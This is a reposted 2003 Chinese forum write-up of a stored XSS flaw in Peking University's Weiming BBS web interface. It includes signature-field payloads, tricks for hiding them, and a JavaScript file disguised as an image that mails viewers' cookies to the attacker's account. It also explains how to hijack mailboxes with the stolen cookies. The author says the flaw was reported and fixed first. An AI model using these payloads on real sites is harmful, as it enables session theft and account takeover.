未名BBS的www一个漏洞的利用

原创 2005年03月03日 08:53:00

未名BBS的www一个漏洞的利用(原创)




1.漏洞的发现



我们知道在telnet方式下可以设置图片签名档,设置格式就是:
<img>图片的URL</img>

这样当你设置好了之后,当你发表文章后,在www方式下,相应的网页中就会自动生成以下H
TML代码:
<img src="图片的URL" border=0>

这个原理相信大家都明白,但是如果仔细推敲和发挥想像就会做到出人意料的效果:
试想,如果我的图片签名档这样设置:
<img>"> 任何代码 <q "</img>

那么在www方式下你的文章所在的页面中相应的HTML代码就是:
<img src=""> 任何代码 <q "" border=0>

现在你会意识到什么了?那就是我们可以在未名BBS的www方式下加入任何代码(浏览器支持
的任何代码)!!!于是我们就可以充分发挥我们的想

像来做我们想玩的东西。



2.漏洞的利用技巧



在我们准备动手之前,可以先做一个简单测试:
将签名档设为: <img>"> alert() <q "</img>
然后到test板发一篇文章。

这样,在www下点击你的文章时就会看到弹出alert()窗口。
但是很快你就会发现两个破绽:

1) 图片签名档由于img的src="",找不到路径,因而出现了带叉的图片空框,这有可能被细
心的人注意。
2) 要是在telnet下看你的文章时,就会发现你的签名档是一大堆代码,这更会引起管理员的
怀疑的。

所以,接下来我们要设法解决这些问题:
对于第一个问题,可以将签名档设置成:
<img>" style="display:none;"> 任何代码 <q "</img>
这样图片就不显示出来了。
对于第二个问题,可以利用“障眼法”,只需将签名档设置成:

一个文字签名档  足够长的空格  <img>" style="display:none;"> 任何代码 <q "</img>

这样一切工作就做得很隐蔽了,我们就可以放心大胆地去玩了。



3.漏洞的一个可怕的利用——用别人id发文、进入别人信箱



也许有人会利用代码搞点恶作剧或加入一些恶性代码满足某种目的,但毕竟这些都还不会带
来很严重的后果,而且也并不能发挥你的多少想像力。
其实,一个更可怕的企图是,能不能利用代码去获取用户的资料?!!

我的一个思路就是,先用代码去获取用户(只要这个id在www下浏览了你的含有那段代码的文
章)机器上的cookie——里面有用户的相关资料,

然后再利用用户的这些资料去以用户的站内信箱发信到我(最好是我的一个马甲)的站内信
箱里,信件内容就是那个cookie里的用户资料。

有了这个想法,实现它就不那么困难了(“只有想不到的,没有做不到的”,呵呵)

下面就是我“作案”的全过程:

首先,制作一个js文件,为了隐蔽起见,将文件扩展名换成.jpg,如aaa.jpg
其内容如下:

document.write('<iframe id=sendit width=1 height=1></iframe>'); //做一个隐藏的iframe

//****自动将cookie发信到我的马甲MaJia信箱里***********************

content='<form id=fm method=POST action="/cgi-bin/bbssdm">'; 
content+='<input type=text name=to value="MaJia">';  //收信人是MaJia
content+='<input type=radio name=signature value=1 checked>';
content+='<input type=text name=title value="cookies">';
content+='';
content+='';
//下面是利用用户的cookie信息得到用户的发信权限,并将信件内容设置为其cookie
//说明:用户cookie的内容是:代号; ID名; 加密后的识别码
//如某个id的cookie: pid=15325; id2=IDName; code2=$1$UMqhPaNK$PbEo3U2lChNJ48lgam
B7Y1
//利用ID名和加密后的识别码就可以进入这个id的信箱或用这个id发文(见后)
content+='<textarea name=text value='+parent.left.document.cookie+'>'+parent.lef
t.document.cookie+'</textarea>';
content+='</form>';

//******************************************************************

content+='<script>fm.submit();</script>';  //发送
sendit.document.write(content);


然后,在test板发文,将上面的aaa.jpg(实际上js文件)粘贴为附件,记住它的url地址。
然后再删掉这个文章——但不用担心,附件仍然在

那里呢(不知道这是不是未名的另一个漏洞)。

接着,在telnet下将签名档设置成:

一个文字签名档  足够长的空格  <img>" style="display:none;"> <script src="aaa.jpg所在的url地址"> <q "</img>

于是,大功告成!下面你就可以在人多的版面上多发几篇引人注意文章,最好有图片附件—
—这样就能吸引别人到www下去看你的文章。

然后,泡上一杯咖啡,听听音乐,过不了多久,你就会在你的马甲的信箱里收到几十甚至上
百封(但有重复)别人送来的他们自己的信息。

进入别人信箱的方法:
首先要确保对方id正在线上,然后你在你自己的www下的点击“发邮件”,然后查看原文件,
另存为mail.htm,然后将form中的一些参数做些设

置就行了,比如相对路径改称绝对的,相应的value值替换成别人id的。然后利用这个mail.
htm给自己发信,发信之后,mail.htm所在的浏览器窗口就自动切换到了别人的信箱里去了,于是,哼哼...

利用别人id发文的方法类似,不再多说了。



4.特别声明



这个漏洞是我在今年1月初发现的,自己的确做了上述的试验,但也就一两次,进入别人信箱
后很快就退出了,没有对别人的邮箱作任何破坏,

也没有纪录和泄露任何人的隐私。

发现这个漏洞后,我及时报告给了技术总监,现在这个漏洞已经完全修复了,所以我才将此
文公开出来。


最后,希望未名尽快完善www方式,毕竟目前的小BUG实在太多了。

 

原发表于:

发信人: neweroica (新英雄), 信区: Homepage
标  题: 未名BBS的www一个漏洞的利用(原创)
发信站: 北大未名站 (2003年02月22日12:27:36 星期六) , 站内信件


 


 
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

北大未名bbs飞越手册

  • 2010-04-17 01:52
  • 3.86MB
  • 下载

北大未名bbs ACM

  • 2008-05-22 12:42
  • 550KB
  • 下载

ubuntu 自添加开机启动程序(一种使ethtool设置永久保存在网络设备中的曲线救国方法) 转自:http://www.groad.net/bbs/read.php?tid-1393.html

他的这个文档虽然是基于9.04的,但我在10.04下配置也是成功的。我要实现的脚本是关于网络配置的,为了方便自己以后使用,也记在这里了。#!/bin/sh #配置网络为100M sudo etht...

我是一个硬盘(转自北大未名)

我是一个硬盘。在一个普普通通的台式机里工作。别人总认为我们是高科技白领,工作又干净又体面,似乎风光得很。也许他们是因为看到洁白漂亮的机箱才有这样的错觉吧。其实象我们这样的小台式机,工作环境狭迫,里面的...

危险的SQL Server!(转自:http://bbs.51cto.com/archiver/tid-398614.html和http://www.sai52.com/archives/450/)

对存储过程进行大手术,并且对帐号调用扩展存储过程的权限要慎重。其实在多数应用中根本用不到多少系统的存储过程,而SQL Server的这么多系统存储过程只是用来适应广大用户需求的,所以请删除不必要的存储...

Lisp的本质(The Nature of Lisp) (转:http://www.lispchina.com/bbs/thread-252-1-1.html)

Lisp的本质(The Nature of Lisp)                            &#...

WWW BBS v3.0

  • 2004-08-24 00:39
  • 22KB
  • 下载

利用HTTP协议和IE的漏洞在其他计算机上运行一个程序

转自:    http://blog.csdn.net/orbit/article/details/168475  我们每天都使用网络浏览五彩缤纷、动感十足的网页,查询需要的信息,你是否想过这些...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)